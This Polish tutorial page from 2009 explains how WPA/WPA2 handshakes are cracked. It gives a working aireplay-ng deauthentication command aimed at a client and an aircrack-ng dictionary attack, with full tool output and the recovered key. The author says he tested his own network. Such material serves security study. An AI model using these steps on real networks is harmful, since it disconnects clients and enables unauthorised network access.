Atak na sieć zabezpieczoną WPA lub WPA2
Ostatnia aktualizacja: 27 lipca 2009
strona główna
WPA, czyli Wi-Fi Protected Access to schemat szyfrowania zaprojektowany przez Wi-Fi Alliance w celu zastąpienia WEP i wszystkich związanych z nim niebezpieczeństw. Główną różnicą między WEP a WPA jest to, że przy WPA celem ataku nie są wszystkie dane przesyłane z i do AP (ponieważ klucz, jakimi są szyfrowane, jest dynamicznie zmieniany), a tylko bardzo specyficzny ich typ - tzw. four-way handshake, następujący wtedy, gdy klient dołącza się do sieci i następuje wymiana hasła dostępowego między AP i klientem. Niestety, hasło to jest też zaszyfrowane. Jedyną metodą ataku na sieć zabezpieczoną WPA jest atak słownikowy lub bruteforce. Obydwa mają - w porównaniu do metod łamania WEP - bardzo małą efektywność.
Jednak zacznijmy. Naszą ofiarą jest :
CH 11 ][ Elapsed: 1 min ][ 2008-08-16 23:41
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:C7:D2:17:64:A7 212 100 606 151 2 11 54 . WPA TKIP PSK LouderThanBombs
BSSID STATION PWR Rate Lost Packets Probe
00:C7:D2:17:64:A7 00:13:E8:BA:B5:59 212 54-54 1 115 LouderThanBombs
Jak widzimy, do sieci jest podłączony jeden klient i wymienia dane. Jednak jest to dla nas całkowicie bezużyteczne. Musimy sobie pomóc aireplay'em. Użyjemy ataku numer zero, czyli deauth. Wysyła on do klienta pakiet mówiący, że nie jest on już połączony z AP, przez co - miejmy nadzieję - połączy się on jeszcze raz, dzięki czemu my uzyskamy nasz four-way handshake. Aireplay wywołujemy następującym poleceniem :
sudo aireplay-ng -0 1 -c 00:13:E8:BA:B5:59 -a 00:C7:D2:17:64:A7 mon0
Spowoduje to uruchomienie aireplay w trybie ataku deauth, który nie będzie ponawiany (-0 1). Celem tego ataku będzie klient o adresie 00:13:E8:BA:B5:59 podłączony do AP o BSSID 00:C7:D2:17:64:A7. Injekcja odbędzie się na interfejsie mon0. Program zwraca :
23:45:51 Waiting for beacon frame (BSSID: 00:C7:D2:17:64:A7) on channel 11
23:45:52 Sending 64 directed DeAuth. STMAC: [00:13:E8:BA:B5:59] [333|318 ACKs]
A w tym czasie - miejmy nadzieję - w oknie cały czas otwartego airodump'a pojawi się informacja (obok daty i godziny) WPA handshake: 00:C7:D2:17:64:A7. Oznacza to, że udało się nam przechwycić four-way handshake i możemy przystąpić do łamania hasła do sieci.
Aircrack'a uruchamiamy następującym poleceniem :
aircrack-ng -w passwords louder-01.cap
Spowoduje to sprawdzenie, czy hasło do handshake'u znajdującego się w louder-01.cap znajduje się w liście passwords. Jeśli aircrack'a uruchomimy bez opcji -w, a wykryje on, że w pliku jemu podawanym znajduje się tylko sieć WPA, zakończy działanie. Jeśli wszystko pójdzie elegancko, zobaczymy następującą treść :
daniel@Sara:~$ aircrack-ng -w passwords louder2-01.cap
Opening louder2-01.cap
Read 2550 packets.
# BSSID ESSID Encryption
1 00:C7:D2:17:64:A7 LouderThanBombs WPA (1 handshake)
Choosing first network as target.
Opening louder2-01.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1147
[00:00:00] 2 keys tested (59.71 k/s)
KEY FOUND! [ RubberRing ]
Master Key : D1 F7 CC 95 E3 CF 3F 37 EB 46 71 11 3A 9C CA 31
56 02 98 5C 28 49 63 7A 66 AB CE C7 8D 48 0E D7
Transcient Key : 94 9B A8 0B 0D 34 A0 E6 11 D2 F1 15 B5 3C 68 A9
E7 A4 4C 16 01 B4 F8 2C C4 97 B4 69 BE 33 18 CC
CF 34 50 9C C8 03 B0 CE 7B D3 3F C1 37 D3 7D 12
D1 23 47 79 79 DB A7 15 5A A1 5D 5F 91 0F A3 44
EAPOL HMAC : 40 60 09 CB 69 93 9B CF AE 17 DF F3 6B A9 8B AA
I tak wygląda łamanie WPA. W moim przypadku poszło bez problemu, bo wiedziałem, jaki jest klucz do mojej własnej sieci, i wpisałem go do listy haseł przeznaczonych do sprawdzenia. Jeśli jednak ofiara zna się mniej więcej na zabezpieczeniach i klucz do jej sieci ma ponad 20 znaków, mogę Ci tylko życzyć powodzenia i długiego (bardzo długiego) czekania. Łamanie WPA2 niczym się nie różni, dlatego nie widziałem sensu w tworzeniu osobnego rozdziału.
strona główna